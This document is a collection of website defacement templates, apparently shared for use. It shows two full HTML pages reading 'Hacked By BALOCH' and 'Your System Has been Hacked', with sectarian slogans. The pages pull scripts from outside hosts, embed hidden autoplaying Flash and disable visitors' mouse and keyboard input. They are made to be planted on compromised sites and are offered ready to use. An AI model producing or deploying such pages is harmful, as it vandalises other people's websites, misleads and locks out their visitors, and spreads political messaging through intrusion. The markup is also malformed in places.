4. Script Deface Baloch



Baloch Hacker


<html>
<head>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<html xmlns="http://www.w3.org/1999/xhtml">
<script type="text/javascript" src="http://rayz-zone.net/js/TypingText.js">
</script>
<SCRIPT language=JavaScript>
<!-- Begin

//Animated Window-
//Modified by DD for NS compatibility
//Visit http://www.dynamicdrive.com for this script

function expandingWindow(website) {
var windowprops='width=100,height=100,scrollbars=yes,status=yes,resizable=yes'
var heightspeed = 2; // vertical scrolling speed (higher = slower)
var widthspeed = 7;  // horizontal scrolling speed (higher = slower)
var leftdist = 10;    // distance to left edge of window
var topdist = 10;     // distance to top edge of window

if (window.resizeTo&&navigator.userAgent.indexOf("Opera")==-1) {
var winwidth = window.screen.availWidth - leftdist;
var winheight = window.screen.availHeight - topdist;
var sizer = window.open("","","left=" + leftdist + ",top=" + topdist +","+ windowprops);
for (sizeheight = 1; sizeheight < winheight; sizeheight += heightspeed)
sizer.resizeTo("1", sizeheight);
for (sizewidth = 1; sizewidth < winwidth; sizewidth += widthspeed)
sizer.resizeTo(sizewidth, sizeheight);
sizer.location = website;
}
else
window.open(website,'mywindow');
}
//  End -->
</SCRIPT>
<style>
.layermensaje { FONT-SIZE: 14pt; COLOR: #2e2e2e; LINE-HEIGHT: 14pt; FONT-FAMILY: "Arial"
}
</style>
    <title>Hacked ? . BALOCH</title>
    <center>
<center><font face="Edwardian Script ITC" size="6"><h2><script language="JavaScript1.2"> 
var message="      Baloch Hacker !  "
var neonbasecolor="red"
var neontextcolor="#FF0000"
var neontextcolor2="#EFFBF2"
var flashspeed=70            // speed of flashing in milliseconds
var flashingletters=6            // number of letters flashing in neontextcolor
var flashingletters2=4            // number of letters flashing in neontextcolor2 (0 to disable)
var flashpause=500            // the pause between flash-cycles in milliseconds

///No need to edit below this line/////

var n=0
if (document.all||document.getElementById){
document.write('<font color="'+neonbasecolor+'">')
for (m=0;m<message.length;m++)
document.write('<span id="neonlight'+m+'">'+message.charAt(m)+'</span>')
document.write('</font>')
}
else
document.write(message)

function crossref(number){
var crossobj=document.all? eval("document.all.neonlight"+number) : document.getElementById("neonlight"+number)
return crossobj
}

function neon(){

//Change all letters to base color
if (n==0){
for (m=0;m<message.length;m++)
crossref(m).style.color=neonbasecolor
}

//cycle through and change individual letters to neon color
crossref(n).style.color=neontextcolor

if (n>flashingletters-1) crossref(n-flashingletters).style.color=neontextcolor2 
if (n>(flashingletters+flashingletters2)-1) crossref(n-flashingletters-flashingletters2).style.color=neonbasecolor


if (n<message.length-1)
n++
else{
n=0
clearInterval(flashing)
setTimeout("beginneon()",flashpause)
return
}
}

function beginneon(){
if (document.all||document.getElementById)
flashing=setInterval("neon()",flashspeed)
}
beginneon()


</script></h2></font></center>
<body bgcolor="#000000" oncontextmenu="return false" onkeydown="return false" onmousedown="return false"> 
      <img alt="" src="https://www.google.com/imgres?imgurl=https%3A%2F%2Fislamghar.com%2Fwp-content%2Fuploads%2F2015%2F03%2Fkalma-pics.jpg&imgrefurl=" style="width: 440px; height: 305px;" /></p>
      <link rel="SHORTCUT ICON" href="http://i48.servimg.com/u/f48/16/08/07/74/indone10.gif" type="image"> 
      <embed src="http://www.swfcabin.com/swf-files/1269328686.swf"  repeat=true autostart=true loop=TRUE width=0 height=0 align="CENTER"></embed>





</body>
<font color="white" size="4"><div id="example1">./ NP : PAKISTANI HACKERS ~ <blink><b><font color="red">Green Day</b><blink></font><br><br></div>

<p id="example2">|| TAHREEK LABBAIK YA RASOOL ALLAH PAKISTAN ||<br><b><blink></font>
</p></font>
<script src="http://masterendi.googlecode.com/files/salju.js"></script>;

<script type="text/javascript">
//Define first typing example:
new TypingText(document.getElementById("example1"));

//Define second typing example (use "slashing" cursor at the end):
new TypingText(document.getElementById("example2"), 100, function(i){ var ar = new Array("\\", "|", "/", "-"); return " " + ar[i.length % ar.length]; });

//Type out examples:
TypingText.runAll();
</script>
<!-- set up your links, either via text links or form buttons-->
<a href="#" onClick="expandingWindow('http://www.facebook.com/indsecdown');return false">Click Button below and say Thanks to us</a><br>
<form>
<input type="button" value="WATCH IT OUT" onClick="expandingWindow('https://youtube.com/c/AllamaKhadimHussainRizvi9263')">
</form>
<center>
<font size="10" face="AgencyFB" color="green">لا إله إلا الله محمد رسول الله <blink><b></b></blink></font><br>
</center>
  <head><body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" style="cursor: crosshair;" bgcolor="green">
</html> 



5. Script Defaced


HACKED!

 <html><head>
<meta http-equiv="content-type" content="text/html; charset=windows-1252">
<meta content="text/html; charset=utf-8">
<title>./ Hacked By BALOCH⚠️</title>
<meta name="Description" content="Hacked by BALOCH⚠️">
<link rel="SHORTCUT ICON" href="http://us.yimg.com/i/mesg/emoticons7/61.gif">
<style>
body,div,h2{margin:0;padding:0}
h2{font-size:100%;font-weight:normal}
#unknown{background:#310404;font-family:Palatino Linotype;z-index:999999;position:fixed;left:0px;width:100%;height:100%;z-index:999999}
.unknown{background:-webkit-radial-gradient(rgba(0,0,0,0.1),rgba(0,0,0,0.3) 50%,rgba(0,0,0,0.7));background:-moz-radial-gradient(rgba

(0,0,0,0.1),rgba(0,0,0,0.3) 50%,rgba(0,0,0,0.7));background:-ms-radial-gradient(rgba(0,0,0,0.1),rgba(0,0,0,0.3) 50%,rgba

(0,0,0,0.7));background:radial-gradient(rgba(0,0,0,0.1),rgba(0,0,0,0.3) 50%,rgba

(0,0,0,0.7));position:absolute;width:100%;height:100%;left:0px;top:0px;z-index:1000}
#unknown h2{position:absolute;line-height:100px;height:100px;font-size:60px;width:100%;text-align:center;color:transparent;-webkit-

animation:blurFadeInOut 3s ease-in backwards;-moz-animation:blurFadeInOut 3s ease-in backwards;-ms-animation:blurFadeInOut 3s ease-in 

backwards;animation:blurFadeInOut 3s ease-in backwards}
#unknown h2.frame-1{-webkit-animation-delay:0s;top:35%;-moz-animation-delay:0s;-ms-animation-delay:0s;animation-delay:0s}
#unknown h2.frame-2{-webkit-animation-delay:3s;top:35%;-moz-animation-delay:3s;-ms-animation-delay:3s;animation-delay:3s}
#unknown h2.frame-3{top:35%;-webkit-animation-delay:6s;-moz-animation-delay:6s;-ms-animation-delay:6s;animation-delay:6s}
#unknown h2.frame-4{-webkit-animation-delay:9s;top:35%;-moz-animation-delay:9s;-ms-animation-delay:9s;animation-delay:9s}
#unknown h2.frame-5{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none;color:white;text-shadow:0px 0px 1px #fff:}
#unknown h2.frame-5 span{-webkit-animation:blurFadeIn 3s ease-in 12s backwards;-moz-animation:blurFadeIn 1s ease-in 12s backwards;-ms-

animation:blurFadeIn 3s ease-in 12s backwards;animation:blurFadeIn 3s ease-in 12s backwards;color:transparent;text-shadow:0px 0px 1px #fff}
#unknown h2.frame-5 span:nth-child(2){-webkit-animation-delay:13s;-moz-animation-delay:13s;-ms-animation-delay:13s;animation-delay:13s}
#unknown h2.frame-5 span:nth-child(3){-webkit-animation-delay:14s;-moz-animation-delay:14s;-ms-animation-delay:14s;animation-delay:14s}
#unknown h2.frame-5 span:nth-child(4){-webkit-animation-delay:15s;-moz-animation-delay:15s;-ms-animation-delay:15s;animation-delay:15s}
#unknown h2.frame-5 span:nth-child(5){-webkit-animation-delay:16s;-moz-animation-delay:16s;-ms-animation-delay:16s;animation-delay:16s}
#unknown h2.frame-6 span{-webkit-animation:blurFadeIn 3s ease-in 12s backwards;-moz-animation:blurFadeIn 1s ease-in 19s backwards;-ms-

animation:blurFadeIn 3s ease-in 19s backwards;animation:blurFadeIn 3s ease-in 19s backwards;color:#FF0B0A;text-shadow:0px 0px 2px #fff;}
#unknown h2.frame-6 span:nth-child(2){-webkit-animation-delay:20s;-moz-animation-delay:20s;-ms-animation-delay:20s;animation-delay:20s;font-

size:20px;color:#FFF;}
#unknown h2.frame-6 span:nth-child(3){-webkit-animation-delay:20s;-moz-animation-delay:20s;-ms-animation-delay:20s;animation-delay:20s;}
#unknown h2.frame-6 span:nth-child(4){-webkit-animation-delay:20s;-moz-animation-delay:20s;-ms-animation-delay:20s;animation-delay:20s;}
#unknown h2.frame-6 span:nth-child(5){-webkit-animation-delay:20s;-moz-animation-delay:20s;-ms-animation-delay:20s;animation-delay:20s;font-

size:20px;color:#FFF;}
.unknown1{position:absolute;width:282px;height:273px;left:50%;top:50%;margin:0;background:none;-webkit-animation:fadeInBack 3.6s linear 14s 

backwards;-moz-animation:fadeInBack 3.6s linear 14s backwards;-ms-animation:fadeInBack 3.6s linear 14s backwards;animation:fadeInBack 3.6s linear 

14s backwards;-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";filter:alpha(opacity=30);opacity:0.3;-webkit-transform:scale(2);-

moz-transform:scale(2);-o-transform:scale(2);-ms-transform:scale(2);transform:scale(2)}

/**/@-webkit-keyframes blurFadeInOut{0%{opacity:0;text-shadow:0px 0px 40px #fff;-webkit-transform:scale(1.3)}
20%,75%{opacity:1;text-shadow:0px 0px 1px #fff;-webkit-transform:scale(1)}
100%{opacity:0;text-shadow:0px 0px 50px #fff;-webkit-transform:scale(0)}
}
@-webkit-keyframes blurFadeIn{0%{opacity:0;text-shadow:0px 0px 40px #fff;-webkit-transform:scale(1.3)}
35%{opacity:0.5;text-shadow:0px 0px 10px #fff;-webkit-transform:scale(1.1)}
100%{opacity:1;text-shadow:0px 0px 1px #fff;-webkit-transform:scale(1)}
}
@-webkit-keyframes fadeInBack{0%{opacity:0;-webkit-transform:scale(0)}
35%{opacity:0.4;-webkit-transform:scale(1)}
100%{opacity:0.2;-webkit-transform:scale(2)}
}
/**/@-moz-keyframes blurFadeInOut{0%{opacity:0;text-shadow:0px 0px 40px #fff;-moz-transform:scale(1.3)}
20%,75%{opacity:1;text-shadow:0px 0px 1px #fff;-moz-transform:scale(1)}
100%{opacity:0;text-shadow:0px 0px 50px #fff;-moz-transform:scale(0)}
}
@-moz-keyframes blurFadeIn{0%{opacity:0;text-shadow:0px 0px 40px #fff;-moz-transform:scale(1.3)}
100%{opacity:1;text-shadow:0px 0px 1px #fff;-moz-transform:scale(1)}
}
@-moz-keyframes fadeInBack{0%{opacity:0;-moz-transform:scale(0)}
35%{opacity:0.4;-moz-transform:scale(1)}
100%{opacity:0.2;-moz-transform:scale(2)}
}
/**/@keyframes blurFadeInOut{0%{opacity:0;text-shadow:0px 0px 40px #fff;transform:scale(1.3)}
20%,75%{opacity:1;text-shadow:0px 0px 1px #fff;transform:scale(1)}
100%{opacity:0;text-shadow:0px 0px 50px #fff;transform:scale(0)}
}
@keyframes blurFadeIn{0%{opacity:0;text-shadow:0px 0px 40px #fff;transform:scale(1.3)}
35%{opacity:0.5;text-shadow:0px 0px 10px #fff;transform:scale(1.1)}
100%{opacity:1;text-shadow:0px 0px 1px #fff;transform:scale(1)}
}
@keyframes fadeInBack{0%{opacity:0;transform:scale(0)}
35%{opacity:0.4;transform:scale(1)}
100%{opacity:0.2;transform:scale(2)}
}
</style>
</head>
<body oncontextmenu="return false" onkeydown="return false" onmousedown="return false" onselectstart="return false" ondragstart="return false">
<div class="container"><div id="unknown">
 <div class="unknown">
<div class="unknown1"></div><h2 class="frame-1">Hello Admin,<br>This is BALOCH HACKER</h2>
<h2 class="frame-2">Into your system...</h2>
<h2 class="frame-3">LABBAIK YA RASOOL ALLAH LABBAIK..</h2>
<h2 class="frame-4">LABBAIK YA RASOOL ALLAH LABBAIK..</h2>
<h2 class="frame-5"><span>Your System</span><span> Has been</span><span> Hacked</span><br><span>By</span></h2>
<h2 class="frame-6"><br><br><span>BALOCH</span><br><span>أَشْهَدُ أَنْ لاَ إِلَهَ إِلاَّ اللَّهُ وَأَشْهَدُ أَنَّ مُحَمَّدًا عَبْدُهُ وَرَسُولُهُ</span></h2>
</div></div></div>
<embed src="_%20Hacked%20By%20R3D-Spear_files/2hJ0l64sRJcloop1autoplay1" type="application/x-shockwave-flash" wmode="transparent" height="0" 

width="0">
</body></html>
